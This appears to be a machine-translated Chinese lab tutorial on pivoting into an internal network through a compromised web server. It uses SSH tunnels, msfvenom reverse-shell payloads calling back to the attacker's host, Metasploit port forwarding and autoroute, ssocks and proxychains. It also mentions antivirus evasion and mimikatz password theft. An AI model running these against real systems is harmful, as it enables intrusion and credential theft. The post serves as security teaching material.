当前位置:网站首页>Penetration test - Foundation - intranet penetration (17)

Penetration test - Foundation - intranet penetration (17)

2020-12-07 10:02:08 osc_ sdnu59mg

**

Penetration test - Foundation chapter - Intranet penetration article ( seventeen )

**

author : Dayu
Time :2020-12-04

brief introduction :

Penetration test - Foundation chapter :
The purpose of this chapter is to re firm the foundation , Strengthen the notes of daily training operation , There will be a lot of jumping thinking operations and methods in recording foundation notes , I hope you can learn something together .

Please note that :

For all the terminals or servers that are reproduced in the notes , It's all self built environment for penetration . I will use Kali Linux As the attacker of this learning machine . The technology used here is for educational purposes only , If the technologies listed are used for any other purpose , I'm not responsible for .

quotes :

Your interest in the business , Determine your accomplishments in this field !


One 、 Preface

This introduction is to get webshell After raising the right , How to further build a tunnel , This is the foundation chapter , It's all basic technology , It won't go deep , I don't say much nonsense , Change numerous for brief , penetration !

Be careful :
The most important thing is thinking , Ideas can be applied in a variety of ways , There are thousands of tools , Usage is secondary !!

Two 、 Introduction to the environment

Attack devices :kali-2020.4
Extranet IP Address :192.168.175.145

Web The server :Ubuntu.20.04.1
Extranet IP Address :192.168.175.153
Intranet IP Address :10.10.1.7

Database and intranet server :windows2003
Intranet IP Address :10.10.1.6

Internet Gateway :192.168.175.2
 Insert picture description here

At present, the database and intranet server are in the Intranet environment ,kali Only access web The server and got it webshell Mention right to success , because web The limitation of server function and authority is great , This article explains the use of SSH Tunnel building kali and windwos2003 Connection between , And the maximum limit of further penetration of the Intranet environment .

3、 ... and 、SSH Tunnel

Now we have web The server's Ubuntu webshell jurisdiction . How to get it here webshell, The early articles have talked about !

1、ssh Forward connection

 Insert picture description here

command :

ssh -CNfL 0.0.0.0:6666:10.10.1.6:80 dayu@127.0.0.1
# Return address + port + Forward tunnel address + Address port   + Local ssh The login address 

intend : Routing loopback address 0+6666 Port establishes intranet server 80 Port Tunnel , The intermediate condition of establishment is ssh access protocol .
 Insert picture description here
You can see that the intranet server is accessed through the forward connection dayu-test.php page , Echo data indicates that the connection was successful .

2、ssh Reverse connection

 Insert picture description here
command :

ssh -qTfnN -R 8888:127.0.0.1:22  kali@192.168.175.145

Intranet server and kali It's impossible to communicate , utilize ssh Reverse proxy will be local 22 The amount of port data is mapped to 8888 On port .

Reverse proxy is not recommended here , But also to explain to you , The main function is to pass through the host of the public network and penetrate the two disconnected LANs . You can skip firewall restrictions here , But once the conversation is broken, it can't be connected anymore .

3、ssh Turn on sockes agent

ssh -D  port  user@theserver

This way is SSH The most violent method in the tunnel , Directly by configuring the browser 、proxychan、Proxifier wait , Configure their sockes5 After that, you can directly use proxy traffic to surf the Internet , about VPS More practical .

3、 ... and 、 Port forwarding

Here's how to use metaspolit Port forwarding and mapping .

 Insert picture description here

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.175.145 LPORT=1037 -f elf > dayu.elf

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.175.145 lport=1037 --f elf -o shell

utilize msfvenom Generate shell, then base64 And other methods to confuse encryption and kill free upload , Bounce back kali-MSF.
No killing, skipping , We'll talk about it later ~ This is based on the preface , Got the... From ubantu shell.

1、 Port mapping

 Insert picture description here

portfwd list		# view list 
portfwd flush		# clear list 
portfwd add -L 192.168.175.145 -l 8089 -p 80 -r 10.10.1.6

You can see the success of the intranet server 10.10.1.6 Of 80 Port mapped to local kali Of 8089 On port .
 Insert picture description here
Through local access 8089 The port can directly access the intranet server 80 page , It's a way of thinking , In the case that the intranet server has different services that can be authorized , All can be forwarded ~

What is used more here is still to use msf Of EXP take shell after , Continue and infiltrate ~

2、 Port forwarding

Port forwarding to local is under special circumstances , Or in shell You can't do it better , Or need to remote to each other's desktop for further operations and so on , Here is the introduction of MSF Port forward to 3389 On , Remote login .
 Insert picture description here
Successfully put port 3389 Forward to local 8090 On port .
 Insert picture description here


portfwd add -l 5555 -p 3389 -r 192.168.175.153
rdesktop 127.1.1.0:8090

You can see it in kali Up operation rdesktop After the success of 8090 Port login to the other party's 3389 On the remote desktop , The password can be uploaded here mimikatz Get the password …

Four 、socket Tunnel

Socket Tunnel ratio SSH Tunnels are more widely used , And easy to use , This method can directly bypass the firewall device for further intranet penetration .

1、 Download and install ssocks

First you need to download :(kali2020.4 and web All servers need to be installed )
 Insert picture description here

http://sourceforge.net/projects/ssocks/

After downloading, unzip and execute :

tar zxvf ssocks-0.0.14.tar.gz
./configure && make		# Edit and generate files 

Then it will appear SRC Catalog , All the files in the tunnel are in the directory :
 Insert picture description here
The operation here mainly uses rcsocks、rssocks.

2、 Perform reverse proxy

 Insert picture description here

./rcsocks -l 3333 -p 2222 -vv

Through... Locally rcsocks Put the port 3333 and 2222 The port establishes the connection channel , Waiting for remote Socks5 Server access local 2222 Port can .
 Insert picture description here

./rssocks -s 192.168.175.145:2222 -vv

adopt rssocks Visit the attacker kali The establishment of a 2222 port , such socket The tunnel was built , The tunnel can be accessed by proxy .

The following also needs some link proxy tools ,firefox browser 、proxychains、proxifire Fine , Here's a demonstration proxychains.

apt install proxychains    # install 

Next, configure vi /etc/proxychains4.conf
 Insert picture description here
Add one sockes that will do :socks5 127.0.0.1 2222
 Insert picture description here
There are many functions here , This is a way of thinking , There's a problem here :gcc Compilation of socks The file in gdb When studying calls , There was a mistake , Segment error ( The core has been dumped ) The size of stack stack is still unresolved , Now it's the system of ubantu , Let's leave it here first , After that, I met with the treatment .



This method can pass through the firewall 、 Various restrictions for flow output , Very practical .

5、 ... and 、 Cross route penetration

This method is also demonstrated according to the first topological diagram , The idea is that the gateway is 192.168.175.2 No intranet 10.10.1.0 In the case of paragraphs , The attacker kali How to connect to intranet servers across routes , And on the intranet server for penetration behavior operation .

1、 View network card information

 Insert picture description here
command :

ifconfig

You can see that you get shell It's a dual network card web The server .

2、 View route status

 Insert picture description here
command :

getuid			# The current user is dayu@dayu
run get_local_subnets		# View the current routing information 

You can see the current routing information :
Local subnet: 10.10.1.0/255.255.255.0
Local subnet: 192.168.175.0/255.255.255.0

 Insert picture description here
command :

run autoroute –p 		# Check whether routing information has been added 

You can see that no routing information has been added , Here we add !

3、 Add local routing information

We can see the routing information in the front 10.10.1.0/24 paragraph , Just add it here :
 Insert picture description here
command :

run autoroute  -s 10.10.1.0/24		# Add route 

You can see that the route was successfully added locally 10.10.1.0/24!!

4、msf-socks4 agent

 Insert picture description here
command :

background		# sign out session Conversation interface ,session Still in the same state ,session + The number will return to 
use auxiliary/server/socks4a	# choice sockes4 Agent module 

SRVHOST  0.0.0.0  	# Local default 
SRVPORT  1080       # The port can be changed by itself , The proxy port 

 Insert picture description here
run Successful execution :
The idea is to reuse session 1 Medium shell, After adding a new route locally , For all local routes sockes4 Traffic agents .

5、 Change the direction of local agents

 Insert picture description here
command :

vi /etc/proxychains4.conf	# add to socks4 Agent traffic 

6、 Successful penetration

 Insert picture description here
 Insert picture description here

command :

proxychains firefox		# Take the agent traffic to open the software 

You can see through proxychains Acting for sockes4 Log in traffic firefox Behind the browser , Go straight to the browser sockes4 After routing and forwarding, the traffic logs on to the intranet server , Successfully achieved intranet penetration .

It's OK here proxychains+nmap、hydra、sqlmap、 And so on. It supports a lot of software

Of course, it's more recommended to go here Proxifier The global agent flies , No more teaching here , Learning is thinking !!

6、 ... and 、 Summarize other ideas

I didn't write my favorite here nc Ideas , Because it's very easy for everyone to use it ! Now I'm going to talk about some port forwarding that I'm going to do 、 Agent and other tools for intranet penetration …

Proxifier、reGeorg、xsocket、nc、Lcx、Frp、IPsec、ngrok, That's all the brain can remember , I don't remember anything else ~~

There are too many tools , Each has its own advantages , One or two is enough for people , The main idea is that , In the process of infiltration, various environments will be encountered , Come on ~~

The above methods are the simplest , It's also the foundation , The idea here learned to penetrate the firewall , There's no problem penetrating all kinds of devices , But don't try not to be discovered … These will be reflected in the traffic behavior characteristics , As long as you want to catch it, you can't run away …

Today, the foundation is solid. That's it , Although the foundation , But it has to be kept in mind .

If you think this blog is good , Welcome to share with others , Welcome to join the free group to learn and grow together .

 Insert picture description here

Such as failure plus personal figure below , Personal wechat pulled into the group .

 Insert picture description here

版权声明
本文为[osc_ sdnu59mg]所创,转载请带上原文链接,感谢
https://chowdera.com/2020/12/202012070951238308.html